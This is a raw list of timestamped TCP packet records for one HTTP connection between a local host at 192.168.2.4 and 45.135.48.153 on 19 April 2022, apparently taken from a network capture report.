Apr 19, 2022 16:44:42.609412909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.609545946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.609600067 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.609622002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.609673977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.609798908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.609843969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.609985113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.610048056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.610121012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.610189915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.610238075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.610316992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.610411882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.610505104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.621215105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.622299910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.624490023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.847604036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.847676039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.847716093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.847755909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.847795010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.847815037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.847835064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.847851992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.847877026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.847917080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.847935915 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.847956896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.847968102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.847996950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848036051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848074913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848089933 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.848114967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848126888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.848155975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848196030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848233938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848246098 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.848273039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848283052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.848313093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848351002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848392010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848404884 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.848429918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848443031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.848469973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848514080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848551035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848567963 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.848591089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848601103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.848632097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848670006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848710060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848720074 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.848750114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848761082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.848790884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848831892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848870039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848882914 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.848908901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848917961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.848951101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.848989964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.849030018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.849040031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.849070072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.849076986 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.849109888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.849152088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.849201918 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.849282980 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.849322081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.849337101 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.849437952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.849579096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.849642038 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.849715948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.849756002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.849769115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.851304054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.851444960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.851520061 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.852327108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.852396011 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.853466988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.853512049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.853552103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.853591919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.853593111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.853632927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.853655100 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.853673935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.853715897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.853743076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.853754997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.853795052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.853835106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.853848934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.853873014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.853888035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.853914022 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.853952885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.853976965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.853995085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854036093 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854074001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854089022 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.854115009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854127884 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.854154110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854212999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854253054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854269981 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.854294062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854305983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.854332924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854372978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854413033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854424953 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.854451895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854465008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.854491949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854533911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854574919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854588032 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.854628086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.854671001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854806900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.854949951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.855010033 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.855155945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.855194092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.855215073 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.855336905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.855488062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.855535984 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.855634928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.855694056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.855812073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.855854988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.855892897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.855931997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.855952024 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.855973959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.855984926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.856014013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.856054068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.856095076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.856107950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.856132984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.856142998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.856832981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.856991053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.857028961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.857058048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.857100010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.857152939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.857342005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.857386112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.857445955 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.857496977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.857553005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.857649088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.857687950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.857846975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.857887983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.857906103 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.857939959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.857997894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.858038902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.858196020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.858237982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.858256102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.858280897 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.858325005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.858515024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.858544111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.858602047 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.858705997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.858757019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.858860970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.859023094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.859050035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.859108925 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.859221935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.859273911 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.859406948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.859435081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.859529972 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.859570026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.859731913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.859760046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.859787941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.859816074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.859818935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.859858990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.859929085 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.859955072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.859981060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.859982967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860011101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860038042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860060930 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.860066891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860094070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.860095024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860124111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860152006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860173941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.860178947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860193014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.860207081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860234976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860260963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860284090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.860287905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860315084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.860316038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860426903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860479116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.860601902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860630035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860658884 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.860752106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860929012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.860989094 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.861074924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.861114979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.861129999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.861243963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.861316919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.861376047 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.861396074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.861444950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.861495018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.861604929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.862849951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.862921000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.863738060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.864823103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.864908934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.864999056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865056992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.865127087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865272045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865302086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865329027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865356922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865360975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.865386009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865407944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.865415096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865443945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865473032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865497112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.865500927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865505934 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.865530968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865557909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865585089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865593910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.865612984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865639925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865641117 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.865653992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.865668058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865695953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865724087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865745068 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.865753889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865776062 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.865780115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865829945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865885973 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.865958929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.865986109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.866013050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.866087914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.866240978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.866312027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.866434097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.866492033 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.866559982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.866691113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.866808891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.866852999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.866872072 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.866899967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.866919994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867129087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867252111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867316961 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.867367983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867417097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867423058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.867444038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867474079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867503881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867527962 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.867531061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867552042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.867561102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867587090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867614985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867633104 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.867643118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867661953 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.867670059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867698908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867724895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.867747068 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.867780924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.868904114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.869148016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.869168997 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.869237900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.869276047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.869333029 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.869401932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.869421959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.869467974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.869518995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.869599104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.869654894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:42.869709969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.869785070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:42.869982958 CEST	80	49758	45.135.48.153	192.168.2.4
